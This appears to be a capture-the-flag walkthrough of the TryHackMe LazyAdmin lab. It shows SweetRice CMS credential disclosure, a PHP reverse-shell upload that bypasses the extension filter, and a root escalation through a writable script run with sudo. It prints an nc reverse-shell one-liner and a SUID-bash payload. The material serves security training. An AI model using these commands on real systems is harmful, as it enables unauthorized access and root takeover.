LazyAdmin TryHackMe Walkthrough
LazyAdmin is an easy level linux boot2root machine available on TryHackMe. This includes exploiting a vulnerability on SweetRice CMS to get login credentials and then uploading our reverse shell to get a low level shell and then exploiting a writable script to get a shell as user root.
Challenge Link: https://tryhackme.com/room/lazyadmin
Initial Enumeration
As usual I started the initial enumeration by running a port scan using nmap, looking for open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nmap -sC -sV -oN nmap/initial 10.10.93.93
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-02 15:50 IST
Nmap scan report for 10.10.93.93
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds
We have only two ports open. There is SSH running on port 22 and Apache web server running on port 80. Let's start the enumeration with port 80 first.
The website shows only the default Apache 2 page. Next I ran a dirb scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ dirb http://10.10.93.93
-----------------
DIRB v2.22
By The Dark Raver
-----------------
URL_BASE: http://10.10.93.93/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.93.93/ ----
==> DIRECTORY: http://10.10.93.93/content/
+ http://10.10.93.93/index.html (CODE:200|SIZE:11321)
+ http://10.10.93.93/server-status (CODE:403|SIZE:276)
---- Entering directory: http://10.10.93.93/content/ ----
==> DIRECTORY: http://10.10.93.93/content/_themes/
==> DIRECTORY: http://10.10.93.93/content/as/
==> DIRECTORY: http://10.10.93.93/content/attachment/
==> DIRECTORY: http://10.10.93.93/content/images/
==> DIRECTORY: http://10.10.93.93/content/inc/
+ http://10.10.93.93/content/index.php (CODE:200|SIZE:2197)
==> DIRECTORY: http://10.10.93.93/content/js/
We have a directory named /content. When we visit the directory, we see a landing page which says that the website is still under construction.
Also we see a line in the footer of the web page which says powered by Basic-CMS.ORG Sweet Rice. This might be the name of the CMS.
We also have a directory named /as where we can login into the CMS but we need a valid username and password for it. I tried guessing some common username and passwords but none of them worked.
Next I searched for 'basiccms.org sweet rice', but instead of getting the website or documentation, I found a few exploitDB links in the top results XD. I looked through all the exploits and the one which I found interesting was an information disclosure exploit.
According to the exploit, we can simply visit the /inc/mysql_backup/ directory to get a MySQL backup.
I downloaded the backup file and opened it in a text editor. Inside the backup file, I found the password hash for the user manager.
We can crack this hash using hydra or some online password cracking website such as crackstation.net.
This was a very easy password. Now we can login into SweetRice CMS using the credentials we've found into /as directory that we found earlier.
Initial Shell
After logging in, I found an option named Media Center where we can upload our own files. We can upload our php shell here and execute it in order to get a reverse shell back to our system.
But we cannot simply upload our reverse shell there because the upload functionality does not accept .php
files.
But we can upload the reverse shell by using some other extensions such as .php5
or .phtml
. Once the upload is complete we can run it from the /content/attachment
directory.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connection received from (UNKNOWN) [10.10.93.93] 37266
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
15:03:30 up 2:50, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$
Next I upgraded the dumb shell into a fully interactive TTY using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179
Next I checked the /home directory and there was a user named itguy
. Inside the home directory of user itguy
we can read our user flag.
www-data@THM-Chal:/$ ls -lah /home
total 12K
drwxr-xr-x 3 root root 4.0K Nov 29 2019 .
drwxr-xr-x 23 root root 4.0K Nov 29 2019 ..
drwxr-xr-x 18 itguy itguy 4.0K Nov 30 2019 itguy
www-data@THM-Chal:/$ cd home/itguy/
www-data@THM-Chal:/home/itguy$ wc -c user.txt
38 user.txt
Root Shell
Next I ran the sudo -l
command to check if we run can any command as user root and found that user www-data
can run a perl script present the home directory of user itguy
as root.
www-data@THM-Chal:/home/itguy$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
Next when I checked the contents of /home/itguy/backup.pl
, I found that it was executing another file /etc/copy.sh
.
www-data@THM-Chal:/home/itguy$ cat backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
Now I checked the contents of /etc/copy.sh
and found a code to get a reverse shell inside it XD.
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Next, I checked the permissions of this file and found that we have the permissions to write this file. So instead of getting a reverse shell, I copied the /bin/bash
to the/tmp
directory and made it a SUID to get the root shell.
www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh
www-data@THM-Chal:/home/itguy$ echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > /etc/copy.sh
Now if we execute the backup.pl
, it will create a binary named bash in the /tmp
directory. Then we can execute the binary to get the root shell.
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal:/home/itguy$ cd /tmp
www-data@THM-Chal:/tmp$ ./bash -p
bash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Hurray! We're now root and now we can read our final flag present in the /root
directory.
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# wc -c root.txt
38 root.txt
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alfrey Davilla.